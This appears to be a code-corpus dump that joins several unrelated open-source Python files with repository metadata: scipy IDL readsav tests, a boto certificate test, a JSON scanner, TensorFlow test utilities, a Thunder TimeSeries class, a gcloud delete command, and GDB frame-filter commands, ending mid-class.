assert_identical(s.pointers_rep.h, s_expect)
assert_(np.all(vect_id(s.pointers_rep.g) == vect_id(s.pointers_rep.h)))
def test_arrays(self):
s = readsav(path.join(DATA_PATH, 'struct_pointer_arrays.sav'), verbose=False)
assert_array_identical(s.arrays.g[0], np.repeat(np.float32(4.), 2).astype(np.object_))
assert_array_identical(s.arrays.h[0], np.repeat(np.float32(4.), 3).astype(np.object_))
assert_(np.all(vect_id(s.arrays.g[0]) == id(s.arrays.g[0][0])))
assert_(np.all(vect_id(s.arrays.h[0]) == id(s.arrays.h[0][0])))
assert_(id(s.arrays.g[0][0]) == id(s.arrays.h[0][0]))
def test_arrays_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_pointer_arrays_replicated.sav'), verbose=False)
# Check column types
assert_(s.arrays_rep.g.dtype.type is np.object_)
assert_(s.arrays_rep.h.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.g.shape, (5, ))
assert_equal(s.arrays_rep.h.shape, (5, ))
# Check values
for i in range(5):
assert_array_identical(s.arrays_rep.g[i], np.repeat(np.float32(4.), 2).astype(np.object_))
assert_array_identical(s.arrays_rep.h[i], np.repeat(np.float32(4.), 3).astype(np.object_))
assert_(np.all(vect_id(s.arrays_rep.g[i]) == id(s.arrays_rep.g[0][0])))
assert_(np.all(vect_id(s.arrays_rep.h[i]) == id(s.arrays_rep.h[0][0])))
def test_arrays_replicated_3d(self):
pth = path.join(DATA_PATH, 'struct_pointer_arrays_replicated_3d.sav')
s = readsav(pth, verbose=False)
# Check column types
assert_(s.arrays_rep.g.dtype.type is np.object_)
assert_(s.arrays_rep.h.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.g.shape, (4, 3, 2))
assert_equal(s.arrays_rep.h.shape, (4, 3, 2))
# Check values
for i in range(4):
for j in range(3):
for k in range(2):
assert_array_identical(s.arrays_rep.g[i, j, k],
np.repeat(np.float32(4.), 2).astype(np.object_))
assert_array_identical(s.arrays_rep.h[i, j, k],
np.repeat(np.float32(4.), 3).astype(np.object_))
assert_(np.all(vect_id(s.arrays_rep.g[i, j, k]) == id(s.arrays_rep.g[0, 0, 0][0])))
assert_(np.all(vect_id(s.arrays_rep.h[i, j, k]) == id(s.arrays_rep.h[0, 0, 0][0])))
class TestTags:
    '''Test that sav files with a description tag can be read at all'''
def test_description(self):
s = readsav(path.join(DATA_PATH, 'scalar_byte_descr.sav'), verbose=False)
assert_identical(s.i8u, np.uint8(234))
def test_null_pointer():
# Regression test for null pointers.
s = readsav(path.join(DATA_PATH, 'null_pointer.sav'), verbose=False)
assert_identical(s.point, None)
assert_identical(s.check, np.int16(5))
def test_invalid_pointer():
# Regression test for invalid pointers (gh-4613).
# In some files in the wild, pointers can sometimes refer to a heap
# variable that does not exist. In that case, we now gracefully fail for
# that variable and replace the variable with None and emit a warning.
# Since it's difficult to artificially produce such files, the file used
# here has been edited to force the pointer reference to be invalid.
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
s = readsav(path.join(DATA_PATH, 'invalid_pointer.sav'), verbose=False)
assert_(len(w) == 1)
assert_(str(w[0].message) == ("Variable referenced by pointer not found in "
"heap: variable will be set to None"))
assert_identical(s['a'], np.array([None, None]))
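# --- Illustrative usage sketch (not part of the original test module) ---
# Reading an IDL .sav file outside the test suite follows the same pattern used
# throughout these tests (the file path here is hypothetical):
#
#     from scipy.io.idl import readsav
#     data = readsav('session.sav', verbose=False)
#     print(sorted(data.keys()))        # variables saved in the file
#     print(data['some_variable'])      # accessed like a dict (or via attributes)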
|
bsd-3-clause
|
varunarya10/boto
|
tests/integration/cloudsearch/test_cert_verification.py
|
126
|
1577
|
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Check that all of the certs on all service endpoints validate.
"""
import unittest
from tests.integration import ServiceCertVerificationTest
import boto.cloudsearch
class CloudSearchCertVerificationTest(unittest.TestCase, ServiceCertVerificationTest):
cloudsearch = True
regions = boto.cloudsearch.regions()
def sample_service_call(self, conn):
conn.describe_domains()
|
mit
|
bratsche/Neutron-Drive
|
google_appengine/lib/django_1_2/django/utils/simplejson/scanner.py
|
928
|
2227
|
"""JSON token scanner
"""
import re
try:
from simplejson._speedups import make_scanner as c_make_scanner
except ImportError:
c_make_scanner = None
__all__ = ['make_scanner']
NUMBER_RE = re.compile(
r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',
(re.VERBOSE | re.MULTILINE | re.DOTALL))
def py_make_scanner(context):
parse_object = context.parse_object
parse_array = context.parse_array
parse_string = context.parse_string
match_number = NUMBER_RE.match
encoding = context.encoding
strict = context.strict
parse_float = context.parse_float
parse_int = context.parse_int
parse_constant = context.parse_constant
object_hook = context.object_hook
def _scan_once(string, idx):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return parse_string(string, idx + 1, encoding, strict)
elif nextchar == '{':
return parse_object((string, idx + 1), encoding, strict, _scan_once, object_hook)
elif nextchar == '[':
return parse_array((string, idx + 1), _scan_once)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = parse_float(integer + (frac or '') + (exp or ''))
else:
res = parse_int(integer)
return res, m.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
return _scan_once
make_scanner = c_make_scanner or py_make_scanner
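# --- Illustrative usage sketch (not part of the original module) ---
# make_scanner() is normally invoked by the sibling decoder module, which passes
# a JSONDecoder instance as the `context` object carrying parse_object,
# parse_array, parse_string, etc. Assuming that decoder module is importable:
#
#     from django.utils.simplejson.decoder import JSONDecoder
#
#     scan_once = make_scanner(JSONDecoder())
#     value, end = scan_once('[1, 2.5, "x"]', 0)
#     # value == [1, 2.5, u'x']; end is the index just past the closing bracket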
|
bsd-3-clause
|
Weihonghao/ECM
|
Vpy34/lib/python3.5/site-packages/tensorflow/contrib/learn/python/learn/estimators/estimator_test_utils.py
|
11
|
2081
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils for Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import tensorflow as tf
FLAGS = tf.flags.FLAGS
def assert_estimator_contract(tester, estimator_class):
"""Asserts whether given estimator satisfies the expected contract.
This doesn't check every details of contract. This test is used for that a
function is not forgotten to implement in a precanned Estimator.
Args:
tester: A tf.test.TestCase.
estimator_class: 'type' object of pre-canned estimator.
"""
attributes = inspect.getmembers(estimator_class)
attribute_names = [a[0] for a in attributes]
tester.assertTrue('config' in attribute_names)
tester.assertTrue('evaluate' in attribute_names)
tester.assertTrue('export' in attribute_names)
tester.assertTrue('fit' in attribute_names)
tester.assertTrue('get_variable_names' in attribute_names)
tester.assertTrue('get_variable_value' in attribute_names)
tester.assertTrue('model_dir' in attribute_names)
tester.assertTrue('predict' in attribute_names)
def assert_in_range(min_value, max_value, key, metrics):
actual_value = metrics[key]
if actual_value < min_value:
raise ValueError('%s: %s < %s.' % (key, actual_value, min_value))
if actual_value > max_value:
raise ValueError('%s: %s > %s.' % (key, actual_value, max_value))
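# --- Illustrative usage sketch (not part of the original module) ---
# How these helpers might be called from a test case; `MyEstimator` and the
# metrics dict below are hypothetical:
#
#     class MyEstimatorTest(tf.test.TestCase):
#
#         def test_contract(self):
#             assert_estimator_contract(self, MyEstimator)
#
#         def test_accuracy_in_range(self):
#             metrics = {'accuracy': 0.87}
#             assert_in_range(0.5, 1.0, 'accuracy', metrics)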
|
agpl-3.0
|
Sorsly/subtle
|
google-cloud-sdk/lib/surface/logging/metrics/delete.py
|
6
|
2018
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'logging metrics delete' command."""
from googlecloudsdk.api_lib.logging import util
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a logs-based metric."""
@staticmethod
def Args(parser):
"""Register flags for this command."""
parser.add_argument(
'metric_name', help='The name of the metric to delete.')
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
"""
if not console_io.PromptContinue(
'Really delete metric [%s]?' % args.metric_name):
raise exceptions.ToolException('action canceled by user')
util.GetClient().projects_metrics.Delete(
util.GetMessages().LoggingProjectsMetricsDeleteRequest(
metricName=util.CreateResourceName(
util.GetCurrentProjectParent(), 'metrics', args.metric_name)))
log.DeletedResource(args.metric_name)
Delete.detailed_help = {
'DESCRIPTION': """\
        Deletes a logs-based metric.
""",
'EXAMPLES': """\
To delete a metric called high_severity_count, run:
$ {command} high_severity_count
""",
}
|
mit
|
zhwa/thunder
|
thunder/rdds/timeseries.py
|
7
|
10869
|
from numpy import sqrt, pi, angle, fft, fix, zeros, roll, dot, mean, \
array, size, asarray, polyfit, polyval, arange, \
percentile, ceil, float64, where, floor
from thunder.rdds.series import Series
from thunder.utils.common import loadMatVar, checkParams
class TimeSeries(Series):
"""
Distributed collection of time series data.
Backed by an RDD of key-value pairs where the key is an identifier
and the value is a one-dimensional array. The common index
specifies the time of each entry in the array.
Parameters
----------
rdd : RDD of (tuple, array) pairs
RDD containing the series data.
index : array-like
        Time indices; must be the same length as the arrays in the input data.
Defaults to arange(len(data)) if not provided.
dims : Dimensions
Specify the dimensions of the keys (min, max, and count), can
avoid computation if known in advance.
See also
--------
Series : base class for Series data
"""
# use superclass __init__
@property
def _constructor(self):
return TimeSeries
def _makeWindowMasks(self, indices, window):
"""
        Make masks used by windowing functions.
        Given a list of indices specifying window centers,
        and a window size, construct a list of index arrays,
        one per window, that index into the target array.
Parameters
----------
indices : array-like
List of times specifying window centers
window : int
Window size
"""
before = window / 2
after = window / 2 + divmod(window, 2)[1]
index = asarray(self.index)
indices = asarray(indices)
if where(index == max(indices))[0][0] + after > len(index):
raise ValueError("Maximum requested index %g, with window %g, exceeds length %g"
% (max(indices), window, len(index)))
if where(index == min(indices))[0][0] - before < 0:
raise ValueError("Minimum requested index %g, with window %g, is less than 0"
% (min(indices), window))
masks = [arange(where(index == i)[0][0]-before, where(index == i)[0][0]+after) for i in indices]
return masks
def meanByWindow(self, indices, window):
"""
Average time series across multiple windows specified by their centers
Parameters
----------
indices : array-like
List of times specifying window centers
window : int
Window size
"""
masks = self._makeWindowMasks(indices, window)
rdd = self.rdd.mapValues(lambda x: mean([x[m] for m in masks], axis=0))
index = arange(0, len(masks[0]))
return self._constructor(rdd, index=index).__finalize__(self)
def groupByWindow(self, indices, window):
"""
Group time series into multiple windows specified by their centers
Parameters
----------
indices : array-like
List of times specifying window centers
window : int
Window size
"""
masks = self._makeWindowMasks(indices, window)
rdd = self.rdd.flatMap(lambda (k, x): [(k + (i, ), x[m]) for i, m in enumerate(masks)])
index = arange(0, len(masks[0]))
nrecords = self.nrecords * len(indices)
return self._constructor(rdd, index=index, nrecords=nrecords).__finalize__(self)
def subsample(self, sampleFactor=2):
"""
Subsample time series by an integer factor
Parameters
----------
sampleFactor : positive integer, optional, default=2
"""
if sampleFactor < 0:
            raise Exception('Factor for subsampling must be positive, got %g' % sampleFactor)
s = slice(0, len(self.index), sampleFactor)
newIndex = self.index[s]
return self._constructor(
self.rdd.mapValues(lambda v: v[s]), index=newIndex).__finalize__(self)
def fourier(self, freq=None):
"""
Compute statistics of a Fourier decomposition on time series data
Parameters
----------
freq : int
Digital frequency at which to compute coherence and phase
"""
def get(y, freq):
y = y - mean(y)
nframes = len(y)
ft = fft.fft(y)
ft = ft[0:int(fix(nframes/2))]
ampFt = 2*abs(ft)/nframes
amp = ampFt[freq]
ampSum = sqrt(sum(ampFt**2))
co = amp / ampSum
ph = -(pi/2) - angle(ft[freq])
if ph < 0:
ph += pi * 2
return array([co, ph])
if freq >= int(fix(size(self.index)/2)):
raise Exception('Requested frequency, %g, is too high, must be less than half the series duration' % freq)
rdd = self.rdd.mapValues(lambda x: get(x, freq))
return Series(rdd, index=['coherence', 'phase']).__finalize__(self)
def convolve(self, signal, mode='full', var=None):
"""
        Convolve time series data against another signal
Parameters
----------
signal : array, or str
Signal to convolve with, can be a numpy array or a
MAT file containing the signal as a variable
var : str
Variable name if loading from a MAT file
mode : str, optional, default='full'
            Mode of convolution, options are 'full', 'same', and 'valid'
"""
from numpy import convolve
if type(signal) is str:
s = loadMatVar(signal, var)
else:
s = asarray(signal)
n = size(self.index)
m = size(s)
newrdd = self.rdd.mapValues(lambda x: convolve(x, s, mode))
# use expected lengths to make a new index
if mode == 'same':
newmax = max(n, m)
elif mode == 'valid':
newmax = max(m, n) - min(m, n) + 1
else:
newmax = n+m-1
newindex = arange(0, newmax)
return self._constructor(newrdd, index=newindex).__finalize__(self)
def crossCorr(self, signal, lag=0, var=None):
"""
Cross correlate time series data against another signal
Parameters
----------
signal : array, or str
Signal to correlate against, can be a numpy array or a
MAT file containing the signal as a variable
var : str
Variable name if loading from a MAT file
lag : int
Range of lags to consider, will cover (-lag, +lag)
"""
from scipy.linalg import norm
if type(signal) is str:
s = loadMatVar(signal, var)
else:
s = asarray(signal)
# standardize signal
s = s - mean(s)
s = s / norm(s)
if size(s) != size(self.index):
raise Exception('Size of signal to cross correlate with, %g, does not match size of series' % size(s))
# created a matrix with lagged signals
if lag != 0:
shifts = range(-lag, lag+1)
d = len(s)
m = len(shifts)
sShifted = zeros((m, d))
for i in range(0, len(shifts)):
tmp = roll(s, shifts[i])
if shifts[i] < 0: # zero padding
tmp[(d+shifts[i]):] = 0
if shifts[i] > 0:
tmp[:shifts[i]] = 0
sShifted[i, :] = tmp
s = sShifted
else:
shifts = 0
def get(y, s):
y = y - mean(y)
n = norm(y)
if n == 0:
b = zeros((s.shape[0],))
else:
y /= norm(y)
b = dot(s, y)
return b
rdd = self.rdd.mapValues(lambda x: get(x, s))
return self._constructor(rdd, index=shifts).__finalize__(self)
def detrend(self, method='linear', **kwargs):
"""
Detrend time series data with linear or nonlinear detrending
Preserve intercept so that subsequent steps can adjust the baseline
Parameters
----------
method : str, optional, default = 'linear'
Detrending method
order : int, optional, default = 5
Order of polynomial, for non-linear detrending only
"""
checkParams(method, ['linear', 'nonlinear'])
if method.lower() == 'linear':
order = 1
else:
if 'order' in kwargs:
order = kwargs['order']
else:
order = 5
def func(y):
x = arange(1, len(y)+1)
p = polyfit(x, y, order)
p[-1] = 0
yy = polyval(p, x)
return y - yy
return self.applyValues(func, keepIndex=True)
def normalize(self, baseline='percentile', window=None, perc=20):
"""
Normalize each time series by subtracting and dividing by a baseline.
Baseline can be derived from a global mean or percentile,
or a smoothed percentile estimated within a rolling window.
Parameters
----------
baseline : str, optional, default = 'percentile'
Quantity to use as the baseline, options are 'mean', 'percentile', 'window', or 'window-fast'
window : int, optional, default = 6
Size of window for baseline estimation, for 'window' and 'window-fast' baseline only
perc : int, optional, default = 20
Percentile value to use, for 'percentile', 'window', or 'window-fast' baseline only
"""
checkParams(baseline, ['mean', 'percentile', 'window', 'window-fast'])
method = baseline.lower()
from warnings import warn
if not (method == 'window' or method == 'window-fast') and window is not None:
warn('Setting window without using method "window" has no effect')
if method == 'mean':
baseFunc = mean
if method == 'percentile':
baseFunc = lambda x: percentile(x, perc)
if method == 'window':
if window & 0x1:
left, right = (ceil(window/2), ceil(window/2) + 1)
else:
left, right = (window/2, window/2)
n = len(self.index)
baseFunc = lambda x: asarray([percentile(x[max(ix-left, 0):min(ix+right+1, n)], perc)
for ix in arange(0, n)])
if method == 'window-fast':
from scipy.ndimage.filters import percentile_filter
baseFunc = lambda x: percentile_filter(x.astype(float64), perc, window, mode='nearest')
def get(y):
b = baseFunc(y)
return (y - b) / (b + 0.1)
return self.applyValues(get, keepIndex=True)
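# Hypothetical usage sketch (not part of the original library): a small helper
# showing how the methods above are meant to compose. The `ts` argument is
# assumed to be an instance of this TimeSeries class, already backed by an RDD
# of (key, array) records; constructing one is outside the scope of this file.
def _example_event_triggered_average(ts, eventTimes, window=20):
    """Normalize each series, then average windows centered on each event time."""
    normalized = ts.normalize(baseline='percentile', perc=20)
    # meanByWindow returns a new TimeSeries whose index runs over the window
    return normalized.meanByWindow(indices=eventTimes, window=window)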
|
apache-2.0
|
makermade/arm_android-19_arm-linux-androideabi-4.8
|
share/gdb/python/gdb/command/frame_filters.py
|
126
|
16605
|
# Frame-filter commands.
# Copyright (C) 2013-2014 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""GDB commands for working with frame-filters."""
import sys
import gdb
import copy
from gdb.FrameIterator import FrameIterator
from gdb.FrameDecorator import FrameDecorator
import gdb.frames
import itertools
# GDB Commands.
class SetFilterPrefixCmd(gdb.Command):
"""Prefix command for 'set' frame-filter related operations."""
def __init__(self):
super(SetFilterPrefixCmd, self).__init__("set frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class ShowFilterPrefixCmd(gdb.Command):
"""Prefix command for 'show' frame-filter related operations."""
def __init__(self):
super(ShowFilterPrefixCmd, self).__init__("show frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class InfoFrameFilter(gdb.Command):
"""List all registered Python frame-filters.
Usage: info frame-filter
"""
def __init__(self):
super(InfoFrameFilter, self).__init__("info frame-filter",
gdb.COMMAND_DATA)
@staticmethod
def enabled_string(state):
"""Return "Yes" if filter is enabled, otherwise "No"."""
if state:
return "Yes"
else:
return "No"
def list_frame_filters(self, frame_filters):
""" Internal worker function to list and print frame filters
in a dictionary.
Arguments:
frame_filters: The name of the dictionary, as
specified by GDB user commands.
"""
sorted_frame_filters = sorted(frame_filters.items(),
key=lambda i: gdb.frames.get_priority(i[1]),
reverse=True)
if len(sorted_frame_filters) == 0:
print(" No frame filters registered.")
else:
print(" Priority Enabled Name")
for frame_filter in sorted_frame_filters:
name = frame_filter[0]
try:
priority = '{:<8}'.format(
str(gdb.frames.get_priority(frame_filter[1])))
enabled = '{:<7}'.format(
self.enabled_string(gdb.frames.get_enabled(frame_filter[1])))
except Exception:
e = sys.exc_info()[1]
print(" Error printing filter '"+name+"': "+str(e))
else:
print(" %s %s %s" % (priority, enabled, name))
def print_list(self, title, filter_list, blank_line):
print(title)
self.list_frame_filters(filter_list)
if blank_line:
print("")
def invoke(self, arg, from_tty):
self.print_list("global frame-filters:", gdb.frame_filters, True)
cp = gdb.current_progspace()
self.print_list("progspace %s frame-filters:" % cp.filename,
cp.frame_filters, True)
for objfile in gdb.objfiles():
self.print_list("objfile %s frame-filters:" % objfile.filename,
objfile.frame_filters, False)
# Internal enable/disable functions.
def _enable_parse_arg(cmd_name, arg):
""" Internal worker function to take an argument from
enable/disable and return a tuple of arguments.
Arguments:
cmd_name: Name of the command invoking this function.
arg: The argument as a string.
Returns:
A tuple containing the dictionary, and the argument, or just
the dictionary in the case of "all".
"""
argv = gdb.string_to_argv(arg)
argc = len(argv)
if argv[0] == "all" and argc > 1:
raise gdb.GdbError(cmd_name + ": with 'all' " \
"you may not specify a filter.")
else:
if argv[0] != "all" and argc != 2:
raise gdb.GdbError(cmd_name + " takes exactly two arguments.")
return argv
def _do_enable_frame_filter(command_tuple, flag):
"""Worker for enabling/disabling frame_filters.
Arguments:
command_tuple: A tuple with the first element being the
frame filter dictionary, and the second being
the frame filter name.
flag: True for Enable, False for Disable.
"""
list_op = command_tuple[0]
op_list = gdb.frames.return_list(list_op)
if list_op == "all":
for item in op_list:
gdb.frames.set_enabled(item, flag)
else:
frame_filter = command_tuple[1]
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_enabled(ff, flag)
def _complete_frame_filter_list(text, word, all_flag):
"""Worker for frame filter dictionary name completion.
Arguments:
text: The full text of the command line.
word: The most recent word of the command line.
all_flag: Whether to include the word "all" in completion.
Returns:
A list of suggested frame filter dictionary name completions
from text/word analysis. This list can be empty when there
are no suggestions for completion.
"""
if all_flag:
filter_locations = ["all", "global", "progspace"]
else:
filter_locations = ["global", "progspace"]
for objfile in gdb.objfiles():
filter_locations.append(objfile.filename)
# If the user just asked for completions with no completion
# hints, just return all the frame filter dictionaries we know
# about.
if (text == ""):
return filter_locations
# Otherwise filter on what we know.
flist = list(filter(lambda x, y=text: x.startswith(y), filter_locations))
# If we only have one completion, complete it and return it.
if len(flist) == 1:
flist[0] = flist[0][len(text)-len(word):]
# Otherwise, return an empty list, or a list of frame filter
# dictionaries that the previous filter operation returned.
return flist
def _complete_frame_filter_name(word, printer_dict):
"""Worker for frame filter name completion.
Arguments:
word: The most recent word of the command line.
printer_dict: The frame filter dictionary to search for frame
filter name completions.
Returns: A list of suggested frame filter name completions
from word analysis of the frame filter dictionary. This list
can be empty when there are no suggestions for completion.
"""
printer_keys = printer_dict.keys()
if (word == ""):
return printer_keys
flist = list(filter(lambda x, y=word: x.startswith(y), printer_keys))
return flist
class EnableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: enable frame-filter enable DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If neither "all" nor one of the two named
dictionaries is specified, the dictionary name is assumed to be the
name of an object file.
NAME matches the name of the frame-filter to operate on. If
DICTIONARY is "all", NAME is ignored.
"""
def __init__(self):
super(EnableFrameFilter, self).__init__("enable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("enable frame-filter", arg)
_do_enable_frame_filter(command_tuple, True)
class DisableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: disable frame-filter DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If neither "all" nor one of the two named
dictionaries is specified, the dictionary name is assumed to be the
name of an object file.
NAME matches the name of the frame-filter to operate on. If
DICTIONARY is "all", NAME is ignored.
"""
def __init__(self):
super(DisableFrameFilter, self).__init__("disable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("disable frame-filter", arg)
_do_enable_frame_filter(command_tuple, False)
class SetFrameFilterPriority(gdb.Command):
"""GDB command to set the priority of the specified frame-filter.
Usage: set frame-filter priority DICTIONARY NAME PRIORITY
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of the object-file name.
NAME matches the name of the frame filter to operate on.
PRIORITY is an integer to assign as the new priority of the frame
filter.
"""
def __init__(self):
super(SetFrameFilterPriority, self).__init__("set frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a priority from a tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, name and priority from
the arguments.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc != 3:
print("set frame-filter priority " \
"takes exactly three arguments.")
return None
return argv
def _set_filter_priority(self, command_tuple):
"""Internal worker for setting priority of frame-filters, by
parsing a tuple and calling _set_priority with the parsed
tuple.
Arguments:
command_tuple: Tuple which contains the arguments from the
command.
"""
list_op = command_tuple[0]
frame_filter = command_tuple[1]
# GDB returns arguments as a string, so convert priority to
# a number.
priority = int(command_tuple[2])
op_list = gdb.frames.return_list(list_op)
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_priority(ff, priority)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple is not None:
self._set_filter_priority(command_tuple)
class ShowFrameFilterPriority(gdb.Command):
"""GDB command to show the priority of the specified frame-filter.
Usage: show frame-filter priority DICTIONARY NAME
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of the object-file name.
NAME matches the name of the frame-filter to operate on.
"""
def __init__(self):
super(ShowFrameFilterPriority, self).__init__("show frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a dictionary and name from a
tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, and frame filter name.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc != 2:
print("show frame-filter priority " \
"takes exactly two arguments.")
return None
return argv
def get_filter_priority(self, frame_filters, name):
"""Worker for retrieving the priority of frame_filters.
Arguments:
frame_filters: Name of frame filter dictionary.
name: Name of the frame filter to look up.
Returns:
The priority of the frame filter.
Raises:
gdb.GdbError: A frame filter cannot be found.
"""
op_list = gdb.frames.return_list(frame_filters)
try:
ff = op_list[name]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
return gdb.frames.get_priority(ff)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple is None:
return
filter_name = command_tuple[1]
list_name = command_tuple[0]
try:
priority = self.get_filter_priority(list_name, filter_name)
except Exception:
e = sys.exc_info()[1]
print("Error printing filter priority for '"+name+"':"+str(e))
else:
print("Priority of filter '" + filter_name + "' in list '" \
+ list_name + "' is: " + str(priority))
# Register commands
SetFilterPrefixCmd()
ShowFilterPrefixCmd()
InfoFrameFilter()
EnableFrameFilter()
DisableFrameFilter()
SetFrameFilterPriority()
ShowFrameFilterPriority()
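# Hypothetical example (not part of GDB): the kind of frame filter object the
# commands above manage. A frame filter needs 'name', 'enabled' and 'priority'
# attributes plus a filter() method, and becomes visible to "info frame-filter"
# once added to a frame filter dictionary. It is shown here for illustration
# only and is never instantiated by this module.
class _ExamplePassThroughFilter(object):
    def __init__(self):
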